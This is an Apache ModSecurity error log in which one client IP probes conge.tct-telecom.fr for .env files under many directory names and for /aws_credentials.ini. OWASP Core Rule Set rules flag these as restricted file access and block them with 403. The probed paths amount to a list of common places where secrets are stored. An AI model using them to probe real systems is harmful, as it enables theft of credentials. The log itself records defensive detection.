[Mon May 11 20:56:00.528383 2026] [security2:error] [pid 1516058:tid 1516102] [client 195.178.110.199:36068] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/apps/.env"] [unique_id "agImQCMeXtzav-mi9SyxugAAAMw"]
[Mon May 11 20:56:00.688793 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/application/.env"] [unique_id "agImQNeaRXe5lR8y0ZOTBgAAAVM"]
[Mon May 11 20:56:00.688958 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/application/.env"] [unique_id "agImQNeaRXe5lR8y0ZOTBgAAAVM"]
[Mon May 11 20:56:00.689142 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/application/.env"] [unique_id "agImQNeaRXe5lR8y0ZOTBgAAAVM"]
[Mon May 11 20:56:00.766345 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env.local"] [unique_id "agImQPjVc-A-CSptvm1xngAAAFE"]
[Mon May 11 20:56:00.766572 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env.local"] [unique_id "agImQPjVc-A-CSptvm1xngAAAFE"]
[Mon May 11 20:56:00.766781 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/app/.env.local"] [unique_id "agImQPjVc-A-CSptvm1xngAAAFE"]
[Mon May 11 20:56:00.833997 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/aws_credentials.ini"] [unique_id "agImQPjVc-A-CSptvm1xoQAAAFE"]
[Mon May 11 20:56:00.834338 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/aws_credentials.ini"] [unique_id "agImQPjVc-A-CSptvm1xoQAAAFE"]
[Mon May 11 20:56:00.834509 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/aws_credentials.ini"] [unique_id "agImQPjVc-A-CSptvm1xoQAAAFE"]
[Mon May 11 20:56:00.851764 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /back-end/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/back-end/.env"] [unique_id "agImQPjVc-A-CSptvm1xogAAAFE"]
[Mon May 11 20:56:00.851927 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/back-end/.env"] [unique_id "agImQPjVc-A-CSptvm1xogAAAFE"]
[Mon May 11 20:56:00.852102 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/back-end/.env"] [unique_id "agImQPjVc-A-CSptvm1xogAAAFE"]
[Mon May 11 20:56:00.854237 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /back/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/back/.env"] [unique_id "agImQCMeXtzav-mi9SyxwAAAANg"]
[Mon May 11 20:56:00.854392 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/back/.env"] [unique_id "agImQCMeXtzav-mi9SyxwAAAANg"]
[Mon May 11 20:56:00.854561 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/back/.env"] [unique_id "agImQCMeXtzav-mi9SyxwAAAANg"]
[Mon May 11 20:56:00.859575 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend-api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/backend-api/.env"] [unique_id "agImQDP5Q_-MBliRCAxnngAAABY"]
[Mon May 11 20:56:00.859725 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/backend-api/.env"] [unique_id "agImQDP5Q_-MBliRCAxnngAAABY"]
[Mon May 11 20:56:00.859900 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/backend-api/.env"] [unique_id "agImQDP5Q_-MBliRCAxnngAAABY"]
[Mon May 11 20:56:00.861150 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agImQDP5Q_-MBliRCAxnnwAAAAI"]
[Mon May 11 20:56:00.861330 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agImQDP5Q_-MBliRCAxnnwAAAAI"]
[Mon May 11 20:56:00.861504 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/backend/.env"] [unique_id "agImQDP5Q_-MBliRCAxnnwAAAAI"]
[Mon May 11 20:56:01.080322 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backup/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/backup/.env"] [unique_id "agImQSMeXtzav-mi9SyxxQAAAMo"]
[Mon May 11 20:56:01.080473 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/backup/.env"] [unique_id "agImQSMeXtzav-mi9SyxxQAAAMo"]
[Mon May 11 20:56:01.080644 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/backup/.env"] [unique_id "agImQSMeXtzav-mi9SyxxQAAAMo"]
[Mon May 11 20:56:01.083180 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /be/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/be/.env"] [unique_id "agImQTP5Q_-MBliRCAxnowAAAAI"]
[Mon May 11 20:56:01.083332 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/be/.env"] [unique_id "agImQTP5Q_-MBliRCAxnowAAAAI"]
[Mon May 11 20:56:01.083495 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/be/.env"] [unique_id "agImQTP5Q_-MBliRCAxnowAAAAI"]
[Mon May 11 20:56:01.097662 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/beta/.env"] [unique_id "agImQfjVc-A-CSptvm1xqgAAAFE"]
[Mon May 11 20:56:01.097816 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/beta/.env"] [unique_id "agImQfjVc-A-CSptvm1xqgAAAFE"]
[Mon May 11 20:56:01.097992 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/beta/.env"] [unique_id "agImQfjVc-A-CSptvm1xqgAAAFE"]
[Mon May 11 20:56:01.245281 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/client/.env"] [unique_id "agImQdeaRXe5lR8y0ZOTEAAAAVM"]
[Mon May 11 20:56:01.245452 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/client/.env"] [unique_id "agImQdeaRXe5lR8y0ZOTEAAAAVM"]
[Mon May 11 20:56:01.245623 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/client/.env"] [unique_id "agImQdeaRXe5lR8y0ZOTEAAAAVM"]
[Mon May 11 20:56:01.325326 2026] [proxy_fcgi:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] AH01071: Got error 'Primary script unknown'
[Mon May 11 20:56:01.400541 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /back-api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/back-api/.env"] [unique_id "agImQfjVc-A-CSptvm1xqwAAAFU"]
[Mon May 11 20:56:01.400767 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/back-api/.env"] [unique_id "agImQfjVc-A-CSptvm1xqwAAAFU"]
[Mon May 11 20:56:01.400977 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/back-api/.env"] [unique_id "agImQfjVc-A-CSptvm1xqwAAAFU"]
[Mon May 11 20:56:01.486545 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agImQTP5Q_-MBliRCAxnqwAAABg"]
[Mon May 11 20:56:01.486721 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agImQTP5Q_-MBliRCAxnqwAAABg"]
